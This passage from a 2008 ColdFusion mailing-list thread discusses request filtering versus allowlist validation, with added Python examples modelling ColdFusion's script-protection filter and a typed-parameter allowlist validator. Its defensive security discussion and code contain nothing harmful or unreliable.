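    "cookie": {"CFID": "12345"},
}


def apply_script_protection(scopes, patterns=CROSS_SITE_SCRIPT_PATTERNS):
    """Run every string value in every scope through the configured patterns.

    Returns (filtered_scopes, hits): a copy of the scopes with each match
    replaced by its configured replacement text, plus a list of
    (scope, variable, pattern, match_count) tuples suitable for logging.
    Case-insensitive matching is an assumption of this model.
    """
    compiled = [(re.compile(p, re.IGNORECASE), repl) for p, repl in patterns.items()]
    filtered = {}
    hits = []
    for scope_name, variables in scopes.items():
        filtered[scope_name] = {}
        for var_name, value in variables.items():
            new_value = value
            for regex, repl in compiled:
                # subn returns the rewritten string and how many matches it replaced
                new_value, count = regex.subn(repl, new_value)
                if count:
                    hits.append((scope_name, var_name, regex.pattern, count))
            filtered[scope_name][var_name] = new_value
    return filtered, hits


if __name__ == "__main__":
    filtered, hits = apply_script_protection(SAMPLE_REQUEST)
    for hit in hits:
        print("filtered:", hit)
    # A legitimate <metadata> value is clobbered along with the genuine tags.
    print(filtered["form"]["title"])
```

Two things the run makes visible that the description alone does not: the `\s*` and case-insensitive matching mean `<  EMBED` is caught as readily as `<embed`, and the same pattern rewrites the harmless form value `<metadata>` to `<InvalidTagdata>`. That collateral damage on legitimate input, plus the fact that the filter only ever recognises what it has been told to look for, is the practical side of Jochem's objection to filtering as a security measure.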
Author:
denstar
08/16/2008 07:24 PM

I'm doing the request filtering in Apache so that it never even bothers my CF engine with the request, but I was wondering if Jochem didn't like the filtering for a reason.

I wouldn't rely on it alone in any way, shape or form, but just cutting down on the "spam" hits on the application seems like a worthy deal. Doing it at the network level would be even faster and less intensive application-wise, but I'm wondering if there's a problem with the very idea that I haven't thought of. Accidentally removing legitimate traffic, or just trading one weakness for another-- something like that.

We need to be preventing this stuff on every level, layered like an onion, as someone said earlier. I was not endorsing request filtering as a sole means of protection, for the record. :-)

Gracias for the info on what turning on global script protection actually is!

:Den
--
He had a wonderful talent for packing thought close, and rendering it portable.
Thomas B. Macaulay

----- Excess quoted text cut - see Original Post for more -----

Author:
Jochem van Dieten
08/17/2008 04:12 AM

denstar wrote:
>
>> I haven't mentioned this before because I do believe that filtering
>> request URLs is the wrong approach
>
> Care to elaborate on this?

Filtering means "allow unless it matches". A security measure should be "deny unless it matches".

Jochem

Author:
denstar
08/17/2008 05:52 AM

----- Excess quoted text cut - see Original Post for more -----

So long as it's a simple list of matches, right? If the list is too complicated, you get the Gödel's Theorem effect, neh? :-)

Heh, I can see it now-- MG3 not only auto-generates your controllers and XML and whatnot, but using the power of introspection, it adds rewrite rules to your vhost conf file per event, with type-binding!

That actually sounds pretty cool.

See, I'm wondering if this is closer to searching than security, per se. Sorta thinking (it's getting late, so bear with me :) of a lame example: I could parse a paragraph looking for every word that's good, and tossing out the swear-words-- or just look for swear-words. Which is going to be faster? Which list is longer?

Maybe that analogy is broken. Probably. Hmm... Yup, cause you'd have to throw in that they could make up new curses as well, without you even knowing. Hmm...

Well, I'm sure you get the point I'm trying to make by now (which could be a non-point), but I'll elaborate further, because I'm not sure if it is a point :-)p

I'd want the lowest-level, most used to be the fastest checks, and the highest level, least used to be the slowest, most thorough. In an ideal world, you could run the highest all the time, but that might be a fake world, because the more encrypted you get, the longer it takes, not only to break, but to encode and decode. Maybe. Probably another broken analogy (and a lie ta boot), but whatever. :)

Hmm... if you've got access to all the data at each level (what to allow, say, in rewrite rules, or query parameters, etc.), I don't see why you couldn't lock it down to only what's possible, vs. what could be. It would take organization tho. Borg-like, Terminator-making organization. :-)

Or maybe you've got a simple solution to how one would limit URL requests to only allowable values? I can't see anything short of automation, but that's why this is taking so long. Probably overlooking something simple. Eh.

What's your scenario, to help me grok this here, Jochem? Search Engine Safe? Ha! That's simple! Force a pattern-- string([A-z]), number, string! Easy.

Is that a solve?

Damn. This, by now dead, horse is freaking beat. I'm going to sign off now...

-- slowly steps away from the keyboard... --

Author:
Jochem van Dieten
08/17/2008 12:48 PM

denstar wrote:
----- Excess quoted text cut - see Original Post for more -----

I don't think simple solutions exist. The closest I have seen that still was simple yet appeared to be somewhat effective was a company that did something akin to Hungarian notation. They had all their variables typed like user_uuid and article_int, and they did type / bounds checking in the webserver, throwing security errors on every type mismatch or occurrence of a variable without the type declared.

Jochem

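Jochem's "deny unless it matches" rule and the suffix-typed scheme he describes (user_uuid, article_int, with type and bounds checks in the web server) can be written down as a small allowlist validator. The following is an added example, not code from the thread or from the company Jochem mentions: the `_int` and `_uuid` suffixes come from his post, the `_slug` type, the 32-bit bounds and the sample requests are assumptions made for the example, and the UUID pattern is the RFC 4122 text form (ColdFusion's own CreateUUID() produces a 35-character 8-4-4-16 form, which would need its own pattern). Anything that is not positively recognised, including a parameter with no type suffix at all, is rejected.

```python
import re


class RequestValidationError(Exception):
    """Raised for any parameter that cannot be positively validated."""


# Strict RFC 4122 text form (8-4-4-4-12 hex groups).  ColdFusion's CreateUUID()
# emits a 35-character 8-4-4-16 form instead; add a pattern for it if you store those.
UUID_RE = re.compile(
    r"[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}", re.IGNORECASE
)
INT_RE = re.compile(r"-?[0-9]{1,10}")          # shape only; bounds checked below
SLUG_RE = re.compile(r"[a-z0-9](?:[a-z0-9-]{0,62}[a-z0-9])?")  # assumed extra type


def parse_int(raw):
    """Signed 32-bit integer: shape check first, then a bounds check."""
    if not INT_RE.fullmatch(raw):
        raise ValueError("not an integer")
    value = int(raw)
    if not -2**31 <= value <= 2**31 - 1:
        raise ValueError("integer out of range")
    return value


def parse_uuid(raw):
    """UUID in canonical text form, normalised to lower case."""
    if not UUID_RE.fullmatch(raw):
        raise ValueError("not a UUID")
    return raw.lower()


def parse_slug(raw):
    """Lower-case URL slug: letters, digits and inner hyphens, at most 64 chars."""
    if not SLUG_RE.fullmatch(raw):
        raise ValueError("not a slug")
    return raw


# Suffix -> parser.  int and uuid are the types named in the thread; slug is an
# addition for this example.
TYPE_RULES = {"int": parse_int, "uuid": parse_uuid, "slug": parse_slug}


def validate_request(params, rules=TYPE_RULES):
    """Allowlist validation of a query-string or form dict.

    Every parameter must end in a declared type suffix, and its value must parse
    under that type.  Unknown or missing suffixes and malformed or out-of-range
    values all raise, so nothing reaches the application unless it is recognised.
    """
    clean = {}
    for name, raw in params.items():
        _, sep, suffix = name.rpartition("_")
        if not sep or suffix not in rules:
            raise RequestValidationError(f"no declared type for parameter {name!r}")
        try:
            clean[name] = rules[suffix](raw)
        except ValueError as exc:
            raise RequestValidationError(f"{name}={raw!r}: {exc}") from None
    return clean


def check_request(params):
    """Wrapper returning ('allowed', clean_params) or ('denied', reason)."""
    try:
        return "allowed", validate_request(params)
    except RequestValidationError as exc:
        return "denied", str(exc)


# Constructed sample requests (values made up for this example).
GOOD_REQUEST = {"user_uuid": "123E4567-E89B-12D3-A456-426614174000", "article_int": "42"}
UNDECLARED_REQUEST = {"article_int": "42", "comment": "hi"}   # no type suffix
MALFORMED_REQUEST = {"article_int": "42abc"}                    # wrong shape
OUT_OF_RANGE_REQUEST = {"article_int": "4294967296"}            # exceeds 2**31 - 1

if __name__ == "__main__":
    for req in (GOOD_REQUEST, UNDECLARED_REQUEST, MALFORMED_REQUEST, OUT_OF_RANGE_REQUEST):
        print(check_request(req))
```

Note that every rule is a `fullmatch` against an explicit character class, and the integer rule adds a bounds check after the shape check, since a string of ten digits can still be too large for the column it is bound to. On the pattern denstar proposes in the previous post, `[A-z]` in a regex also admits the six punctuation characters that sit between `Z` and `a` in ASCII, so spell the class out as `[A-Za-z]`.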
Author:
Qing Xia
08/19/2008 10:58 AM

Hello folks:

I am sorry about the thread jump here, but any ASP gurus out there on this discussion list?

In the past week, I have been fanatically patching our old CF code and applying CFQUERYPARAM wherever it applies. Additionally, I also implemented the SQL Injection Blocker written by Gabriel and Mary Jo. It is extremely helpful.

However, a big chunk of our old application is written in ASP. It was an off-the-shelf content-management system which we plan to replace soon.